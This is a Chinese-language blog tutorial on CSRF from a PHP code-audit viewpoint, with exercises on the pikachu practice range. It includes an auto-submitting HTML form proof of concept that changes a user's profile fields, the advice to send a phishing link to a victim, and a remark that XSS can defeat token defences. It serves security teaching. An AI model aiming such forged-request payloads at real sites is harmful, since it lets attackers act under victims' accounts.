PHP代码审计 ------------CSRF漏洞

最新推荐文章于 2023-12-21 16:35:33 发布
最新推荐文章于 2023-12-21 16:35:33 发布
阅读量200 收藏
点赞数
文章标签: php csrf 开发语言
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_62344745/article/details/130201178
版权

漏洞介绍

        CSRF( Cross-site request forgery)跨站请求伪造,也有人写出XSRF。黑客伪造用户木匾用户的HTTP请求。然后将这个HTTP请求发送给存在CSRF的网站,有CSRF的网站执行了伪造的HTTP请求,就引发了跨站请求伪造

        相对来说,比xss更具有危害性,

漏洞危害

        攻击者盗用了你的身份信息,以你的名义发送恶意请求

        以你名义发送邮件,发消息,盗取你的账号,甚至于购买商品虚拟货币转账等

        造成的问题包括:个人隐私泄露以及财产安全

漏洞本质

        攻击者获取到重要的参数,成功构造一个伪造请求

id=1000 是给转账的人   count=3 是金额 

       决大部分的人,网站上都会记住密码,那么这个操作,就会

攻击流程

        

挖掘思路

        后台功能模块:管理后台、会员中心、添加用户等

        被引用的核心文件里面有没有验证token和referer相关的代码

        没带token: 可以直接请求这个页面

        没带referer: 返回相同的数据

案例

        目标要存在CSRF漏洞

        受害者,需要保持目标站点的活跃状态

        受害者需要点击钓鱼链接

这里我以pikachu靶场为例

        GET CSRF

        

登录的正常状态,用bp抓包,

 

抓到 get 的提交参数, 可以看到有提交值,     也没有token也没有referer

 给这个拿出来

加上对方的IP地址,去让对方 点击这个连接,    这时会修改成  11111111

这时已经修改完毕,

post方式

        

 POST是请求体,不在url中,自己构建一个表单,

<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>csrf_post</title>
    <script>
        window.onload = function(){
            document.getElementById("postsubmit").click();
        }
    </script>
</head>
<body>
    <form action="http://localhost/pikachu-master/vul/csrf/csrfpost/csrf_post_edit.php" method="post">
        <input type="text" name="sex" value="1"><br>
        <input type="hidden" name="phonenum" value="HypeRong"><br>
        <input type="hidden" name="add" value="china"><br>
        <input type="hidden" name="email" value="hacker"><br>
        <input id="postsubmit" type="submit" name="submit" value="submit">
    </form>
</body>
</html>

可以放在自己服务器上,让对面去访问        ???

token         

        当我们刷新页面时Token值会发生变化

        可以防御, 但是 xss攻击,可以获得下一次的token

        bp工具里的   CSRF POC   模块          可以获得下一次token

 

故事结尾117
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
PHP实现登陆表单提交CSRF及验证码
12-19
1、表单提交,并将其提交到本页 (1) form 属性method为post方法,修改路由,使其接收post、get的请求 Route::any('/admin/login','Admin\LoginController@login'); (2)LoginController.php 修改login方法,根据不同的请求返回不同的内容 如果请求方法为get ,返回登陆页面;如果请求为post,就行验证 use Illuminate\Support\Facades\Input; public function login() { if($input = Input::all()){ d
PHP-漏洞之一】跨网站请求伪造
Chanson
04-25 496
攻击者伪造目标用户的HTTP请求,然后此请求发送到有CSRF漏洞的网站,网站执行此请求后,引发跨站请求伪造攻击。 攻击者利用隐蔽的HTTP连接,让目标用户在不注意的情况下单击这个链接,由于是用户自己点击的,而他又是合法用户拥有合法权限,所以目标用户能够在网站内执行特定的HTTP链接,从而达到攻击者的目的。 例如:某个购物网站购买商品时,采用http://www.taobao.com/gouma
【DVWA系列】三、CSRF 跨站请求伪造(源码分析&漏洞利用)
Pluto.的博客
03-12 443
文章目录DVWACSRF 跨站请求伪造一、low 级别二、medium 级别三、high 级别 DVWA CSRF 跨站请求伪造 一、low 级别 无安全防护措施,是判断两次输入的密码是否相同 随便修改一下,观察到修改密码值提交到了url中(get型): password_new=1&password_conf=1&Change=Change# 伪造一个网页,插入URL请求语句,修改密码为666,将它“修饰”一下: <html> <head> <t
php 跨站点请求伪造,PHP 跨站请求伪造及防护 (CSRF)【未完成】
weixin_39778447的博客
03-24 253
一、什么是 CSRF跨站请求伪造(Cross-Site Request Forgery),通常缩写为 CSRF 或者 XSRF,是一种使已登录用户在不知情的情况下执行某种动作的攻击。二、CSRF请求过程CSRF在违反同源策略的情况下,攻击主要用来执行某种非法动作,而非窃取用户数据。例如,当受害者是一个普通用户时,CSRF可以实现在其不知情的情况下进行转移用户资金、发送邮件等操作。但是如果受害者是一...
PHP漏洞全解(六)-跨网站请求伪造
zacklin的专栏
04-16 1048
CSRF(Cross Site Request Forgeries),意为跨网站请求伪造,也有写为XSRF。攻击者伪造目标用户的HTTP请求,然后此请求发送到有CSRF漏洞的网站,网站执行此请求后,引发跨站请求伪造攻击。攻击者利用隐蔽的HTTP连接,让目标用户在不注意的情况下单击这个链接,由于是用户自己点击的,而他又是合法用户拥有合法权限,所以目标用户能够在网站内执行特定的HTTP链接,从而达到攻
php安全(三):csrf攻击
llllllloooooo的博客
06-01 921
    CSRF(Cross-site request forgery),中文名称:跨站请求伪造。首先要获取站点用户登录信息,然后冒充正常用户登录,进行破坏活动,受害方为正常用户和站点。csrf攻击无法完全防范,只能提高攻击的门槛。防御方法:1.改良站内 API 的设计      对于发布帖子这一类创建资源的操作,应该只接受 POST 请求,而 GET 请求应该只浏览而不改变服务器端资源。最理想的...
php csrf攻击,常见的CSRF攻击的原理,让我们一起来了解一下!
weixin_39856208的博客
03-17 222
CSRF即跨站请求攻击。简单的说,是攻击者通过一些技术手段欺骗用户的浏览器去访问一个自己以前认证过的站点并运行一些操作(如发邮件,发消息,甚至财产操作(如转账和购买商品))。因为浏览器之前认证过,所以被访问的站点会认为这是真正的用户操作而去运行。这就利用了web中用户身份认证验证的一个漏洞:简单的身份验证仅仅能保证请求发自某个用户的浏览器,却不能保证请求本身是用户自愿发出的。其实可以这么理解CSR...
php csrf攻击教程,HTTP路由实例教程(三)—— CSRF攻击原理及其防护
weixin_28957063的博客
03-18 247
HTTP路由实例教程(三)—— CSRF攻击原理及其防护由 学院君 创建于5年前, 最后更新于 11个月前版本号 #377487 views92 likes0 collects1、什么是CSRF攻击CSRF是跨站请求伪造(Cross-site request forgery)的英文缩写。关于CSRF攻击原理及其防护,可查看Github上的这个项目:理解CSRF,说得比较详细和透彻。2、Larave...
第二阶段 PHP代码审计CSRF(客户端请求伪造)
qq_22132931的博客
11-24 603
PHP代码审计CSRF(客户端请求伪造)
php防范csrf攻击,PHP开发csrf攻击的简单演示和防范
weixin_26766909的博客
03-10 702
csrf攻击,即cross site request forgery跨站(域名)请求伪造,这里的forgery就是伪造的意思。网上有很多关于csrf的介绍,比如一位前辈的文章CSRF的攻击方式详解,参考这篇文章简单解释下:csrf 攻击能够实现依赖于这样一个简单的事实:我们在用浏览器浏览网页时通常会打开好几个浏览器标签(或窗口),假如我们登录了一个站点A,站点A如果是通过cookie来跟踪用户的会...
安全性测试--CSRF攻击
02-26
CSRF(Cross-siterequestforgery),...CSRF这种攻击方式在2000年已经被国外的安全人员提出,但在国内,直到06年才开始被关注,08年,国内外的多个大型**和交互网站分别爆出CSRF漏洞,如:NYTimes.com(纽约时报)、M
Bolt:CSRF扫描仪-源码
05-25
螺栓笨拙的CSRF扫描仪重要的Bolt处于测试的Beta阶段,这意味着可能存在错误。 不鼓励使用此工具。 欢迎提出请求和问题。 如果您对此仓库感兴趣,我也建议您将它放在监视中。工作流程爬行Bolt将目标网站爬网到指定的...
CSRF:ring-csrf示例
01-28
CSRF:ring-csrf示例
Spring-Security:安全攻击对策
05-13
CSRF预防功能:保护用户免受跨站请求伪造(CSRF)攻击。 具有浏览器安全功能的链接功能:在攻击中滥用了与浏览器安全功能相关的浏览器功能打印出可以保护用户的安全标头。 Spring Security模块配置 模组名称 解释 ...
PHP 预防CSRF、XSS、SQL注入攻击(综合版)
chenrui310的博客
06-20 2554
【简约版】 主要通过校验用户输入信息,过滤用户输入信息,以及关闭错误信息显示等方法。 一、SQL注入:将恶意的SQL命令通过表单提交等方式注入到后台数据库引擎进行执行,从而泄露数据库信息 1.输入验证 2.错误消息处理 3.加密处理 4.使用专业的漏洞扫描工具 二、XSS:跨站脚本攻击,指恶意攻击者往Web页面里插入恶意代码,当用户浏览...
跨站请求伪造(CSRF)漏洞
qq_47848569的博客
05-31 286
CSRF的本质就是在不知情的情况下执行请求利用cookie在浏览器不过期的操作,使攻击者构造恶意的payload来修改用户的信息等pikachu靶场。
PHP 代码审计常规漏洞的步骤和技巧
weixin_62369433的博客
04-12 497
在这个数字化时代,安全已经成为最重要的关键词之一。对于开发人员和安全专业人员来说,代码审计是确保应用程序和服务安全性的一项重要任务。通过审计,可以发现并修复各种类型的漏洞,包括 SQL 注入、XSS、CSRF、文件上传漏洞等。愿你们在代码审计的道路上勇往直前,不断学习和探索,找到应用程序中的所有漏洞,并将其修复,为我们的数字世界带来更加安全可靠的服务。
csrf攻击防御 php,【技术分享】从开发角度浅谈CSRF攻击及防御
weixin_30213477的博客
03-10 178
什么是CSRFCSRF可以叫做(跨站请求伪造),咱们可以这样子理解CSRF,攻击者可以利用你的身份你的名义去发送(请求)一段恶意的请求,从而导致可以利用你的账号(名义)去–购买商品、发邮件,恶意的去消耗账户资源,导致的一些列恶意行为.CSRF可以简单分为Get型和Post型两种。Get型CSRF:看到这个名字,很明显是发送GET请求导致的。我这里简单的说一下:GET型的CSRF利用非常简单,通常只...
如何在PHP中进行跨站请求伪造(CSRF)防护?
最新发布
周祥平程序专栏
12-21 441
您应该仔细评估您的应用程序,根据需要选择适当的防护方法,并进行定期的安全审查和测试,以确保您的应用程序免受CSRF攻击的威胁。跨站请求伪造(CSRF)是一种安全漏洞,攻击者通过伪装请求来利用已认证的用户的权限执行未经授权的操作。您可以检查请求的HTTP Referer头来确保请求来自合法的来源。如果您使用PHP框架(例如Symfony、Laravel等),它们通常提供了内置的CSRF保护机制,可以简化您的工作。对于敏感操作,可以要求用户输入验证码,以确保用户的操作是有意的,而不是来自CSRF攻击。
python x-csrf-token
05-13
在使用 Python 发送 HTTP 请求时,如果请求需要携带 CSRF Token 的话,可以在请求头中添加 "X-CSRF-Token" 字段,并将 Token 值作为其值发送。 以下是一个示例代码: ```python import requests # 假设 CSRF Token 存储在变量 csrf_token 中 csrf_token = "your_csrf_token_here" # 构造请求头 headers = { "X-CSRF-Token": csrf_token, "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3" } # 发送 POST 请求,并携带 CSRF Token response = requests.post(url, data=data, headers=headers) # 处理响应 ... ``` 请注意,CSRF Token 的获取方式因网站而异,一般情况下需要在登录后从响应中提取。另外,CSRF Token 的有效期也可能有限制,需要根据具体情况进行更新。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值